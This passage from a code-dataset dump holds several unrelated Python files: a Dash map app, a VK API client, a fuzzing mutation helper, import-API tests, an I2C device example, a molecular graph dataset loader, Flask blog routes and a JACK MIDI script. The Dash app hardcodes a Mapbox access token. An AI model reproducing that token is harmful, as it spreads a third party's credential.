np.max(datos[\"lat\"]) + 0.05*height,\n sizex= width + 0.1*width,\n sizey= height + 0.1*height,\n sizing= \"stretch\",\n opacity= 1,\n layer= \"below\")]\n }\n }\n\n\n@app.callback(\n dash.dependencies.Output('map', 'figure'),\n [dash.dependencies.Input('time', 'value'),\n dash.dependencies.Input('interval-component', 'n_intervals'),\n dash.dependencies.Input('variable', 'value')])\n\ndef display_map(time, n, variable):\n\n actualizar_datos(time, variable)\n\n estacion = datos.iloc[np.where(datos.MAGNITUD == variable)[0], :][\"ESTACIÓN\"].values\n\n return {\n 'data': [{\n 'lat': y.flatten(),\n 'lon': x.flatten(),\n 'type': 'scattermapbox',\n 'marker': {'size': 8, 'opacity': 0.8},\n 'text': estacion + ': ' + [str(i) for i in z],\n 'hoverinfo': \"text\",\n 'selected': {\n 'marker': {'color': '#85144b'}\n }\n }],\n 'layout': {\n 'mapbox': {\n 'center': {\n 'lat': y_mean,\n 'lon': x_mean\n },\n 'zoom': 10.5,\n 'pitch': 0,\n 'accesstoken': 'pk.eyJ1IjoibWJham9idWUiLCJhIjoiY2pyeTFuMWRrMHFwOTQ5b2E5b2E3Y3NleiJ9.0UXhwZBeHtsd7SPe_0E0QQ'\n },\n 'margin': {'l': 0, 'r': 0, 't': 0, 'b': 0}\n }\n }\n\nif __name__ == '__main__':\n app.run_server(debug=True)\n\n\n\n","repo_name":"crossvalidados/AQ_Madrid","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":9701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71887619432","text":"\"\"\"\nhttps://oauth.vk.com/authorize?client_id=51420426&display=page&scope=stats.offline&response_type=token&v=5.131\n\"\"\"\n\nwith open(\"token.txt\", \"r\") as file_object:\n token = file_object.read().strip()\n\n# print(token)\n\nimport requests\nfrom pprint import pprint\n\n\n# URL = \"https://api.vk.com/method/users.get\"\n# params = {\n# \"user_ids\": \"1, 2\",\n# \"access_token\": token,\n# \"v\": \"5.131\",\n# \"fields\": \"education, sex\"\n# }\n# res = requests.get(URL, params=params)\n# pprint(res.json())\n\n\n# получаем список групп по поисковому запросу\n# def search_group(query: str, sorting=0):\n# \"\"\"\n# 0 - сортировка по умолчанию\n# 1 - сортировка по скорости роста\n# 2 - отношение дневной посещаемости\n# 3 - отношение количества лайков к количеству пользователей\n# 4 - комментариев к количеству пользователей\n# 5 - записей в обсуждениях к количеству пользователей\n# \"\"\"\n# params = {\n# \"q\": query,\n# \"access_token\": token,\n# \"v\": \"5.131\",\n# \"sort\": sorting,\n# \"count\": 300\n# }\n# resp = requests.get(\"https://api.vk.com/method/groups.search\", params).json()\n# response_data = resp[\"response\"][\"items\"]\n# return response_data\n#\n#\n# target_groups = search_group(\"python\")\n# pprint(target_groups)\n\n# # расширенная информация о группе\n# target_group_ids = \"1, 2, 3, 4, 5\"\n# params = {\n# \"access_token\": token,\n# \"v\": \"5.131\",\n# \"group_ids\": target_group_ids,\n# \"fields\": \"members_count, activity, description\"\n# }\n# resp = requests.get(\"https://api.vk.com/method/groups.getById\", params)\n# pprint(resp.json()[\"response\"])\n\n\n# теперь напишем класс для взаимодействия с VkAPI\nclass VkApiClient:\n CNT = 0\n\n def __init__(self, token: str, api_version: str, base_url: str = \"https://api.vk.com/\"):\n self.token = token\n self.api_version = api_version\n self.base_url = base_url\n\n def general_params(self):\n return {\n \"access_token\": self.token,\n \"v\": self.api_version,\n }\n\n def get_users_info(self, user_ids: str, fields: str):\n params = {\n \"user_ids\": user_ids,\n \"fields\": fields,\n }\n params.update(self.general_params())\n return requests.get(f\"{self.base_url}/method/users.get\",\n params=params).json()\n\n def search_group(self, query: str, sorting: int = 0, count: int = 5):\n \"\"\"\n 0 - сортировка по умолчанию\n 1 - сортировка по скорости роста\n 2 - отношение дневной посещаемости\n 3 - отношение количества лайков к количеству пользователей\n 4 - комментариев к количеству пользователей\n 5 - записей в обсуждениях к количеству пользователей\n \"\"\"\n params = {\n \"q\": query,\n \"sort\": sorting,\n \"count\": count\n }\n params.update(self.general_params())\n return requests.get(f\"{self.base_url}/method/groups.search\",\n params=params).json()[\"response\"][\"items\"]\n\n def additional_group_info(self, target_group_ids: str, fields: str):\n self.CNT += 1\n params = {\n \"group_ids\": target_group_ids,\n \"fields\": fields\n }\n params.update(self.general_params())\n return requests.get(f\"{self.base_url}/method/groups.getById\",\n params=params).json()[\"response\"]\n\n\nvk_client = VkApiClient(token=token, api_version=\"5.131\")\nfor _ in range(5):\n pprint(vk_client.additional_group_info(target_group_ids=\"1, 2, 3, 4, 5, 6\",\n fields=\"members_count, activity, description\"))\nprint(f\"Метод additional_group_info был использован {vk_client.CNT} раз за работу программы.\")","repo_name":"majkl84/Netology_new","sub_path":"Basics of the Python programming language/Working with classes using the VK API example/webinar.py","file_name":"webinar.py","file_ext":"py","file_size_in_byte":4295,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11454229131","text":"from variable import *\n\ndef mutateSeeds(seeds_content, mutate_mode, mutate_location=-1, mutate_content=None):\n # use rules to mutate seeds to produce a array to return\n mutate_str = \"\"\n ret_mutate_seeds = []\n if mutate_mode == MUTATE_MODE['each_char']:\n for leni in range(len(seeds_content)):\n for chari in range(0, 256):\n mutate_str = seeds_content[:leni] + chr(chari) + seeds_content[(leni + 1):]\n ret_mutate_seeds.append(mutate_str)\n elif mutate_mode == MUTATE_MODE['each_mutN']:\n for leni in range(len(seeds_content)):\n for chari in [0, 64, 128, 192, 255]:\n mutate_str = seeds_content[:leni] + chr(chari) + seeds_content[(leni + 1):]\n ret_mutate_seeds.append(mutate_str)\n elif mutate_mode == MUTATE_MODE['per_each_mutN']:\n for chari in [0, 64, 128, 192, 255]:\n mutate_str = seeds_content[:mutate_location] + chr(chari) + seeds_content[(mutate_location + 1):]\n ret_mutate_seeds.append(mutate_str)\n return ret_mutate_seeds\n\n\ndef gainCmpSetColor(dynamic_cmp_dict, next_dynamic_cmp_dict):\n temp_bytes_map_cmp_dict = {} # [{cmp_addr:[[type or location], [[value, next_value],[value, next_value]]], cmp_addr:[]},{...}] using array subscript as bytes location\n temp_cmp_map_bytes_set = set() # {cmp_addr:[bytes], cmp_addr:[]}\n for nkey, nvalue in next_dynamic_cmp_dict.items():\n if nkey in dynamic_cmp_dict:\n value = dynamic_cmp_dict[nkey]\n # first using len to judge change type, second using operands to judge\n # print(nvalue, value)\n if len(nvalue) > len(value):\n temp_bytes_map_cmp_dict[nkey] = [[NEXT_GREATER], [value, nvalue]]\n temp_cmp_map_bytes_set.add(nkey)\n elif len(nvalue) < len(value):\n temp_bytes_map_cmp_dict[nkey] = [[NEXT_LESS], [value, nvalue]]\n temp_cmp_map_bytes_set.add(nkey)\n else:\n temp = [[],[]]\n fflag = False\n for index in range(len(nvalue)):\n if value[index] != nvalue[index]:\n temp[0].append(index)\n temp[1].append([value[index], nvalue[index]])\n fflag = True\n if fflag:\n temp_bytes_map_cmp_dict[nkey] = temp\n temp_cmp_map_bytes_set.add(nkey)\n else:\n temp_bytes_map_cmp_dict[nkey] = [[NEXT_OVERSETP], [[-1], nvalue]]\n\n return temp_bytes_map_cmp_dict, temp_cmp_map_bytes_set\n","repo_name":"fengzhengzhan/STFGFuzz","sub_path":"pin_mode/fuzzeroperat.py","file_name":"fuzzeroperat.py","file_ext":"py","file_size_in_byte":2597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"168016529","text":"import pytest\nimport ujson\nfrom aiohttp import StreamReader, web\n\nfrom hamcrest import assert_that, has_entries, instance_of, match_equality\n\nfrom mail.ipa.ipa.core.actions.import_.json import CreateImportFromJSONAction\nfrom mail.ipa.ipa.core.entities.enums import UserImportError\nfrom mail.ipa.ipa.core.entities.import_params import GeneralInitImportParams\nfrom mail.ipa.ipa.core.entities.password import Password\nfrom mail.ipa.ipa.core.entities.stat import ImportStat\nfrom mail.ipa.ipa.core.entities.user_info import UserInfo\n\n\nclass TestCreateImport:\n @pytest.fixture\n def task_id(self):\n return 3\n\n @pytest.fixture\n def import_params_json(self):\n return {\n 'server': 'server.test',\n 'port': 993,\n 'imap': 1,\n 'ssl': 0,\n 'mark_archive_read': 0,\n 'delete_msgs': 1,\n }\n\n @pytest.fixture\n def import_params(self, import_params_json, admin_uid, user_ip, org_id):\n return GeneralInitImportParams(\n server=import_params_json['server'],\n port=import_params_json['port'],\n ssl=bool(import_params_json['ssl']),\n delete_msgs=bool(import_params_json['delete_msgs']),\n mark_archive_read=bool(import_params_json['mark_archive_read']),\n imap=bool(import_params_json['imap']),\n admin_uid=admin_uid,\n user_ip=user_ip,\n org_id=org_id,\n )\n\n @pytest.fixture\n def request_params(self, admin_uid, user_ip, import_params_json):\n return {\n 'admin_uid': admin_uid,\n 'user_ip': user_ip,\n **import_params_json,\n }\n\n @pytest.fixture\n def data(self):\n return None\n\n @pytest.fixture\n async def response(self, app, headers, org_id, request_params, data):\n return await app.post(f'/import/{org_id}/',\n headers=headers,\n params=request_params,\n data=data)\n\n @pytest.fixture\n async def response_json(self, response):\n return await response.json()\n\n class TestCSV:\n @pytest.fixture(autouse=True)\n def create_import_from_csv_mock(self, mock_action, task_id):\n from mail.ipa.ipa.core.actions.import_.csv import CreateImportFromCSVAction\n return mock_action(CreateImportFromCSVAction, task_id)\n\n @pytest.fixture\n def data(self):\n return b'sample;csv'\n\n @pytest.fixture\n def csv_name(self):\n return 'csv-name'\n\n @pytest.fixture\n def request_params(self, request_params, csv_name):\n request_params['name'] = csv_name\n return request_params\n\n @pytest.fixture\n def headers(self):\n content_type = 'text/csv'\n return {'Content-Type': content_type}\n\n def test_create_import_from_csv_call(self,\n create_import_from_csv_mock,\n response,\n org_id,\n admin_uid,\n user_ip,\n import_params,\n csv_name,\n ):\n create_import_from_csv_mock.assert_called_once_with(\n name=csv_name,\n stream=match_equality(instance_of(StreamReader)),\n import_params=import_params,\n )\n\n def test_csv_response(self, response_json, task_id):\n assert_that(\n response_json,\n has_entries({\n 'status': 'success',\n 'data': has_entries({\n 'task_id': str(task_id),\n }),\n })\n )\n\n class TestSchemaErrorEmptyDomain:\n @pytest.fixture\n def request_params(self, request_params):\n request_params['server'] = ''\n return request_params\n\n @pytest.mark.asyncio\n async def test_csv_empty_domain(self, response_json):\n assert_that(\n response_json,\n has_entries({\n 'status': 'fail',\n })\n )\n\n class TestSchemaErrorInvalidPort:\n @pytest.fixture\n def request_params(self, request_params):\n request_params['port'] = 65537\n return request_params\n\n @pytest.mark.asyncio\n async def test_csv_invalid_port(self, response_json):\n assert_that(\n response_json,\n has_entries({\n 'status': 'fail',\n })\n )\n\n class TestJSON:\n @pytest.fixture(autouse=True)\n def create_import_from_json_mock(self, mock_action):\n return mock_action(CreateImportFromJSONAction)\n\n @pytest.fixture\n def headers(self):\n return {'Content-Type': 'application/json'}\n\n @pytest.fixture\n def users(self, rands):\n return [\n UserInfo(\n login=rands(),\n password=Password.from_plain(rands()),\n src_login=rands(),\n )\n for _ in range(3)\n ]\n\n @pytest.fixture\n def data(self, users):\n return ujson.dumps({\n 'users': [\n {\n 'login': user.login,\n 'password': user.password.value(),\n 'src_login': user.src_login,\n }\n for user in users\n ]\n })\n\n def test_create_import_from_json_call(self, create_import_from_json_mock, import_params, users, response):\n create_import_from_json_mock.assert_called_once_with(params=import_params, users=users)\n\n class TestSchemaErrorEmptyDomain:\n @pytest.fixture\n def request_params(self, request_params):\n request_params['server'] = ''\n return request_params\n\n @pytest.mark.asyncio\n async def test_json_empty_domain(self, response_json):\n assert_that(\n response_json,\n has_entries({\n 'status': 'fail',\n })\n )\n\n class TestSchemaErrorInvalidPort:\n @pytest.fixture\n def request_params(self, request_params):\n request_params['port'] = 65537\n return request_params\n\n @pytest.mark.asyncio\n async def test_json_invalid_port(self, response_json):\n assert_that(\n response_json,\n has_entries({\n 'status': 'fail',\n })\n )\n\n class TestUnknownMimeError:\n @pytest.fixture\n def headers(self):\n return {}\n\n def test_unknown_mime(self, response_json):\n assert_that(\n response_json,\n has_entries({\n 'code': 415,\n 'data': has_entries({\n 'message': 'Unsupported media type',\n }),\n })\n )\n\n\nclass TestStatImport:\n @pytest.fixture\n def import_stat(self, randn):\n return ImportStat(\n total=randn(),\n errors=randn(),\n finished=randn(),\n )\n\n @pytest.fixture(autouse=True)\n def action(self, mock_action, import_stat):\n from mail.ipa.ipa.core.actions.stats.summary import GetImportStatAction\n return mock_action(GetImportStatAction, import_stat)\n\n @pytest.fixture\n async def response(self, org_id, app):\n return await app.get(f'/import/{org_id}/stat/')\n\n @pytest.fixture\n async def response_data(self, response):\n return (await response.json())['data']\n\n def test_response_data(self, import_stat, response_data):\n assert response_data == {\n 'total': import_stat.total,\n 'errors': import_stat.errors,\n 'finished': import_stat.finished,\n }\n\n def test_action_call(self, org_id, action, response):\n action.assert_called_once_with(org_id=org_id)\n\n\nclass TestInfoImport:\n @pytest.fixture\n def has_more(self):\n return True\n\n @pytest.fixture\n async def result(self, org_id, create_user, create_collector, has_more):\n result = [\n (await create_user(org_id), None, UserImportError.UNKNOWN_ERROR)\n for _ in range(3)\n ]\n for _ in range(3):\n user = await create_user(org_id)\n collector = await create_collector(user_id=user.user_id)\n error = UserImportError.UNKNOWN_ERROR\n result.append((user, collector, error))\n return result, has_more\n\n @pytest.fixture(autouse=True)\n def action(self, mock_action, result):\n from mail.ipa.ipa.core.actions.stats.info import GetImportInfoAction\n return mock_action(GetImportInfoAction, result)\n\n @pytest.fixture\n def only_errors(self):\n return True\n\n @pytest.fixture\n async def response(self, app, org_id, only_errors):\n params = {}\n if only_errors is not None:\n params['only_errors'] = str(only_errors).lower()\n return await app.get(f'/import/{org_id}/', params=params)\n\n @pytest.fixture\n async def response_json(self, response):\n return await response.json()\n\n def test_response_status(self, response):\n assert response.status == 200\n\n @pytest.mark.parametrize('has_more', (True, False))\n def test_response(self, result, response_json):\n assert response_json == {\n 'code': 200,\n 'status': 'success',\n 'data': {\n 'has_more': result[1],\n 'collectors': [\n {\n 'uid': user.uid,\n 'login': user.login,\n 'error': error.value,\n **(\n {} if collector is None else {\n 'collected': collector.collected,\n 'total': collector.collected,\n 'errors': collector.collected,\n 'params': {\n 'delete_msgs': collector.params.delete_msgs,\n 'imap': collector.params.imap,\n 'mark_archive_read': collector.params.mark_archive_read,\n 'port': collector.params.port,\n 'server': collector.params.server,\n 'ssl': collector.params.ssl,\n 'src_login': collector.params.src_login,\n }\n }\n )\n }\n for user, collector, error in result[0]\n ],\n }\n }\n\n @pytest.mark.parametrize('only_errors', (None, True, False))\n def test_call(self, org_id, action, response, only_errors):\n action.assert_called_once_with(org_id=org_id, only_errors=only_errors or False)\n\n\nclass TestReportImportHandler:\n @pytest.fixture\n def csv_content(self):\n return '1,2,3\\n4,5,6\\n'\n\n @pytest.fixture(autouse=True)\n def action(self, mock_action, csv_content):\n async def dummy_run(self):\n await self._init_kwargs['output'].write(csv_content.encode('utf-8'))\n\n from mail.ipa.ipa.core.actions.report import WriteCSVReportAction\n return mock_action(WriteCSVReportAction, action_func=dummy_run)\n\n @pytest.fixture\n async def response(self, org_id, app):\n return await app.get(f'/import/{org_id}/report/')\n\n @pytest.fixture\n async def response_body(self, response):\n return await response.text()\n\n def test_response_status(self, response):\n assert response.status == 200\n\n def test_response_body(self, csv_content, response_body):\n assert response_body == csv_content\n\n def test_response_headers(self, response):\n assert_that(\n response.headers,\n has_entries({\n 'Content-Type': 'text/csv; charset=utf-8',\n 'Content-Disposition': 'attachment; filename=\"report.csv\"',\n })\n )\n\n def test_action_call(self, org_id, action, response):\n action.assert_called_once_with(\n org_id=org_id,\n output=match_equality(instance_of(web.StreamResponse)),\n )\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"mail/tests/unit/api/test_import_.py","file_name":"test_import_.py","file_ext":"py","file_size_in_byte":12944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5943823311","text":"#!/usr/bin/env python3\n\nfrom asyncio.exceptions import CancelledError\nfrom konashi import *\nimport konashi\nimport logging\nimport asyncio\nimport argparse\n\n\nasync def main(device):\n try:\n if device is None:\n logging.info(\"Scan for konashi devices for 5 seconds\")\n ks = await KonashiScanner.search(5)\n if len(ks) > 0:\n device = ks[0]\n logging.info(\"Use konashi device: {}\".format(device.name))\n else:\n logging.error(\"Could no find a konashi device\")\n return\n try:\n await device.connect(5)\n except Exception as e:\n logging.error(\"Could not connect to konashi device '{}': {}\".format(device.name, e))\n return\n logging.info(\"Connected to device\")\n\n\n # enable I2C in standard mode\n await device.io.i2c.config(konashi.I2CConfig(True, konashi.I2CMode.STANDARD))\n\n sens_addr = 0x11\n cnt = 0\n while True:\n res, addr, data = await device.io.i2c.transaction(konashi.I2COperation.WRITE, sens_addr, 0, [cnt, 0x10, 0x50])\n print(\"Result:\", res, \"Address:\", addr, \"Data:\", data)\n res, addr, data = await device.io.i2c.transaction(konashi.I2COperation.READ, sens_addr, 5, [])\n print(\"Result:\", res, \"Address:\", addr, \"Data:\", data)\n await asyncio.sleep(5)\n cnt += 1\n cnt %= 0xFF\n\n\n except (asyncio.CancelledError, KeyboardInterrupt):\n logging.info(\"Stop loop\")\n except Exception as e:\n logging.error(\"Exception during main loop: {}\".format(e))\n raise e\n finally:\n try:\n if device is not None:\n await device.disconnect()\n logging.info(\"Disconnected\")\n except konashi.Errors.KonashiConnectionError:\n pass\n logging.info(\"Exit\")\n\n\nparser = argparse.ArgumentParser(description=\"Connect to a konashi device, setup I2C and read from a VL6180X sensor.\")\nparser.add_argument(\"--device\", \"-d\", type=Konashi, help=\"The konashi device name to use. Ommit to scan and use first discovered device.\")\nargs = parser.parse_args()\n\nlogging.basicConfig(level=logging.INFO)\n\nloop = asyncio.get_event_loop()\nmain_task = None\ntry:\n main_task = loop.create_task(main(args.device))\n loop.run_until_complete(main_task)\nexcept KeyboardInterrupt:\n if main_task is not None:\n main_task.cancel()\n loop.run_until_complete(main_task)\n main_task.exception()\nfinally:\n loop.close()","repo_name":"YUKAI/konashi5-sdk-python","sub_path":"examples/konashi_i2c/konashi_i2c.py","file_name":"konashi_i2c.py","file_ext":"py","file_size_in_byte":2541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"45221231355","text":"import os\nimport os.path as osp\nimport rdkit\nfrom ogb.utils import smiles2graph\nfrom ogb.utils.torch_util import replace_numpy_with_torchtensor\nfrom ogb.utils.url import extract_zip\nimport pandas as pd\nimport numpy as np\nimport datamol as dm\nfrom md5checker import make_hash\nfrom tqdm import tqdm\nimport torch\nfrom dgl.data.utils import download\nfrom torch_geometric.data import InMemoryDataset\nfrom torch_geometric.data import Data\nfrom graphite.utilities.logging import get_logger\nfrom graphite.utilities.io.extract_tar import extract_tar_gz_file\nfrom graphite.utilities.rdkit import add_conformers\nfrom graphite.utilities.ogb import mol2graph\n\nlogger = get_logger(__name__)\n\n\nclass PCQM4Mv23DDataset(InMemoryDataset):\n def __init__(\n self,\n root,\n url_2d: str = 'https://dgl-data.s3-accelerate.amazonaws.com/dataset/OGB-LSC/pcqm4m-v2.zip',\n url_3d: str = \"http://ogb-data.stanford.edu/data/lsc/pcqm4m-v2-train.sdf.tar.gz\",\n smiles2graph=smiles2graph,\n verbose=True,\n transform=None,\n pre_transform=None,\n split_dict_filepath=None,\n descriptor=False,\n fingerprint=False,\n conformers_memmap: str = None,\n conformer_pool_size: int = 1,\n fingerprint_memmap: str = None,\n descriptor_memmap: str = None,\n ):\n \"\"\"\n Pytorch Geometric PCQM4Mv2 dataset object\n - root (str): the dataset folder will be located at root/pcqm4m_kddcup2021\n - smiles2graph (callable): A callable function that converts a SMILES string into a graph object\n * The default smiles2graph requires rdkit to be installed\n\n # todo: add support for radius_graph from `torch_cluster`\n \"\"\"\n self.verbose = verbose\n self.original_root_dir = root\n root_dir = osp.join(root, 'pcqm4m-v2')\n self.root_dir = root_dir\n self.smiles2graph = smiles2graph\n self.folder = root_dir\n self.version = 1\n self.split_dict_filepath = split_dict_filepath\n self.descriptor = descriptor\n self.fingerprint = fingerprint\n self._url_2d = url_2d\n self._url_3d = url_3d\n\n self.include_positions = conformer_pool_size > 0 and conformers_memmap is not None\n self.conformers_memmap = np.memmap(\n conformers_memmap,\n dtype='float32',\n mode='r',\n shape=(3746620, 10, 60, 3)\n ) if conformers_memmap is not None else None\n self.conformer_pool_size = conformer_pool_size\n assert self.conformer_pool_size <= 10, \"up to 10 conformers are supported at the moment\"\n\n self.fingerprint_memmap = np.memmap(\n fingerprint_memmap,\n dtype='float32',\n mode='r',\n shape=(3746620, 512)\n ) if fingerprint_memmap is not None else None\n\n self.descriptor_memmap = np.memmap(\n descriptor_memmap,\n dtype='float32',\n mode='r',\n shape=(3746620, 201)\n ) if descriptor_memmap is not None else None\n\n super(PCQM4Mv23DDataset, self).__init__(self.folder, transform, pre_transform)\n\n self.data, self.slices = torch.load(self.processed_paths[0])\n\n @property\n def url_2d(self):\n return self._url_2d\n\n @property\n def url_3d(self):\n return self._url_3d\n\n def maybe_log(self, msg: str, level=\"info\") -> None:\n if self.verbose:\n getattr(logger, level)(msg)\n\n def delete_data(self):\n self.data = None\n self.slices = None\n\n def load_data(self):\n self.data, self.slices = torch.load(self.processed_paths[0])\n\n def __getitem__(self, idx):\n if self.data is None:\n self.load_data()\n\n return super().__getitem__(idx)\n\n def get(self, idx):\n g = super().get(idx)\n\n if self.fingerprint:\n if self.fingerprint_memmap is None and 'fingerprint' not in g:\n raise Exception(\"~> the cached dataset, as is, does not contain fingerprint information.\"\n \"please consider recreating the dataset or to provide fingerprint memmap.\")\n\n if 'fingerprint' not in g:\n g['fingerprint'] = torch.from_numpy(np.array(self.fingerprint_memmap[idx, :])).float()\n\n if self.descriptor:\n if self.descriptor_memmap is None and 'molecule_descriptor' not in g:\n raise Exception(\"~> the cached dataset, as is, does not contain molecule descriptor information.\"\n \"please consider recreating the dataset or to provide molecule descriptor memmap.\")\n\n if 'molecule_descriptor' not in g:\n g['molecule_descriptor'] = torch.from_numpy(np.array(self.descriptor_memmap[idx, :])).float()\n\n if self.include_positions and 'positions_3d' not in g:\n g.positions_3d = torch.from_numpy(np.array(self.conformers_memmap[idx, np.random.choice(self.conformer_pool_size), :g.num_nodes, :]))\n return g\n\n @property\n def raw_file_names(self):\n return \"data.csv.gz\"\n\n @property\n def processed_file_names(self):\n return \"geometric_data_processed.pt\"\n\n def download(self):\n self.maybe_log(msg=\"downloading raw material...\")\n\n # - the molecules + labels (2d info from smiles)\n self.maybe_log(msg=\"downloading the 2d information on the molecules...\")\n\n download(self.url_2d, self.original_root_dir)\n # assert make_hash(osp.join(self.raw_dir, 'pcqm4m-v2-train.sdf.tar.gz')) == ''\n\n self.maybe_log(msg=\"extracting the 2d information...\")\n extract_zip(osp.join(self.original_root_dir, self.url_2d.rpartition('/')[2]), self.original_root_dir)\n os.unlink(osp.join(self.original_root_dir, self.url_2d.rpartition('/')[2]))\n\n # - the 3d information\n self.maybe_log(msg=\"downloading the 3d information on the atom positionings...\")\n download(self.url_3d, self.raw_dir)\n assert make_hash(osp.join(self.raw_dir, 'pcqm4m-v2-train.sdf.tar.gz')) == 'fd72bce606e7ddf36c2a832badeec6ab'\n\n self.maybe_log(msg=\"extracting 3d info [sdf file]...\")\n extract_tar_gz_file(f\"{osp.join(self.raw_dir, 'pcqm4m-v2-train.sdf.tar.gz')}\")\n\n def process(self):\n data_df = pd.read_csv(osp.join(self.raw_dir, \"data.csv.gz\"))\n # - in the 3d dataset, we wont use the smiles (for train) and use the\n # sdf instead.\n smiles_list = data_df[\"smiles\"]\n homolumogap_list = data_df[\"homolumogap\"]\n\n # - reading the 3d file\n print(\"reading the SDF file...\")\n suppl = rdkit.Chem.SDMolSupplier(osp.join(self.raw_dir, 'pcqm4m-v2-train.sdf'))\n\n print(\"Converting SMILES strings into graphs...\")\n from graphite.contrib.kpgt.data.descriptors.rdDescriptors import RDKit2D\n from graphite.contrib.kpgt.data.descriptors.rdNormalizedDescriptors import RDKit2DNormalized\n data_list = []\n train_indices = set(self.get_idx_split()['train'].tolist())\n for i in tqdm(range(len(smiles_list))):\n data = Data()\n\n smiles = smiles_list[i]\n homolumogap = homolumogap_list[i]\n\n # - even for 3d data, we would still\n # use the bonds instead of `radius_graph`\n if i in train_indices:\n mol = suppl[i]\n else:\n mol = rdkit.Chem.MolFromSmiles(smiles)\n graph = mol2graph(mol)\n\n assert len(graph[\"edge_feat\"]) == graph[\"edge_index\"].shape[1]\n assert len(graph[\"node_feat\"]) == graph[\"num_nodes\"]\n\n data.__num_nodes__ = int(graph[\"num_nodes\"])\n data.edge_index = torch.from_numpy(graph[\"edge_index\"]).to(torch.int64)\n data.edge_attr = torch.from_numpy(graph[\"edge_feat\"]).to(torch.int64)\n data.x = torch.from_numpy(graph[\"node_feat\"]).to(torch.int64)\n data.y = torch.Tensor([homolumogap])\n\n # 3d graph for train indices\n if i in train_indices:\n # - storing the positions_3d\n positions = torch.from_numpy(mol.GetConformer(0).GetPositions()).float()\n assert data.num_nodes == positions.shape[0]\n data['positions_3d'] = positions\n else:\n data['positions_3d'] = torch.from_numpy(np.array(\n self.conformers_memmap[i, np.random.choice(self.conformer_pool_size), :data.num_nodes, :]))\n\n if self.descriptor:\n mol = rdkit.Chem.MolFromSmiles(smiles)\n data['fingerprint'] = torch.tensor(rdkit.Chem.RDKFingerprint(mol, minPath=1, maxPath=7, fpSize=512)).long()\n if self.fingerprint:\n data['molecule_descriptor'] = torch.tensor(RDKit2DNormalized().process(smiles)).float()\n\n if self.pre_transform is not None and i == 0:\n # - testing pre-transform\n _ = self.pre_transform(data)\n\n data_list.append(data)\n\n # double-check prediction target\n split_dict = self.get_idx_split()\n assert all([not torch.isnan(data_list[i].y)[0] for i in split_dict[\"train\"]])\n assert all([not torch.isnan(data_list[i].y)[0] for i in split_dict[\"valid\"]])\n assert all([torch.isnan(data_list[i].y)[0] for i in split_dict[\"test-dev\"]])\n assert all(\n [torch.isnan(data_list[i].y)[0] for i in split_dict[\"test-challenge\"]]\n )\n\n if self.pre_transform is not None:\n print(\"applying pre-processing transform...\")\n data_list = [self.pre_transform(data) for data in tqdm(data_list)]\n\n data, slices = self.collate(data_list)\n\n print(\"Saving...\")\n torch.save((data, slices), self.processed_paths[0])\n\n def get_idx_split(self):\n if self.split_dict_filepath is None:\n split_dict = replace_numpy_with_torchtensor(\n torch.load(osp.join(self.root, \"split_dict.pt\"))\n )\n else:\n split_dict = replace_numpy_with_torchtensor(\n torch.load(self.split_dict_filepath)\n )\n return split_dict\n","repo_name":"shayanfazeli/graphite_pcqm4mv2","sub_path":"graphite/data/pcqm4mv2/pyg/dataset_3d.py","file_name":"dataset_3d.py","file_ext":"py","file_size_in_byte":10199,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"10222679786","text":"from flask import Blueprint,render_template,redirect,url_for,flash,request\nfrom blogapp import db\nfrom blogapp.post.forms import AddPostForm\nfrom blogapp.post.models import PostModel\nfrom flask_login import login_required\n\npost=Blueprint('post',__name__,url_prefix='/post')\n\n\n@post.route('/')\n@login_required\ndef view_post(id):\n post=PostModel.query.get_or_404(id)\n return render_template('post/post.html',post=post)\n\n@post.route('/create/',methods=['GET','POST'])\n@login_required\ndef create_post(id):\n form=AddPostForm()\n if form.validate_on_submit():\n post=PostModel(title=form.title.data,content=form.content.data,blog_id=id)\n db.session.add(post)\n db.session.commit()\n flash(\"post created successfully!\",'success')\n return redirect(url_for('blog.view_blog',id=id))\n return render_template('post/create_post.html',form=form,form_title='create new post')\n\n@post.route('/update/',methods=['GET','POST'])\n@login_required\ndef update_post(id):\n post=PostModel.query.get_or_404(id)\n form=AddPostForm()\n if request.method=='GET':\n form.title.data=post.title\n form.content.data=post.content\n form.submit.label.text='update'\n\n if form.validate_on_submit():\n post.title=form.title.data\n post.content=form.content.data\n db.session.commit()\n flash('post updated successfully!','success')\n return redirect(url_for('post.view_post',id=id))\n \n return render_template('post/create_post.html',form=form,form_title='update post')\n\n@post.route('/delete/')\n@login_required\ndef delete_post(id):\n post=PostModel.query.get_or_404(id)\n if post:\n db.session.delete(post)\n db.session.commit()\n flash('post deleted successfully!','danger')\n return redirect(url_for('user.home'))\n ","repo_name":"zuber-shekh-rapidops/FlaskBlogApp","sub_path":"blogapp/post/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10536836818","text":"import jack\nimport binascii\nimport struct\n\nclient = jack.Client('MIDI-Monitor')\ninport = client.midi_inports.register('input')\n\noutport = client.midi_outports.register('output')\n\n\n@client.set_process_callback\ndef process(frames):\n\toutport.clear_buffer()\n\t\n\tfor offset, data in inport.incoming_midi_events():\n\t\tprint('{0}: 0x{1}'.format(client.last_frame_time + offset,binascii.hexlify(data).decode()))\n\t\t\n\t\tif len(data) == 3:\n\t\t\tstatus, pitch, vel = struct.unpack('3B', data)\n\t\t\tprint(offset)\n\t\t\tif vel == 127:\n\t\t\t\tprint ('huuarray')\n\t\t\t\toutport.write_midi_event(offset, data)\n\t\t\t\toutport.write_midi_event(offset, (status, pitch + 1, vel))\n\t\t\n\nwith client:\n\tprint('#' * 80)\n\tprint('press Return to quit')\n\tprint('#' * 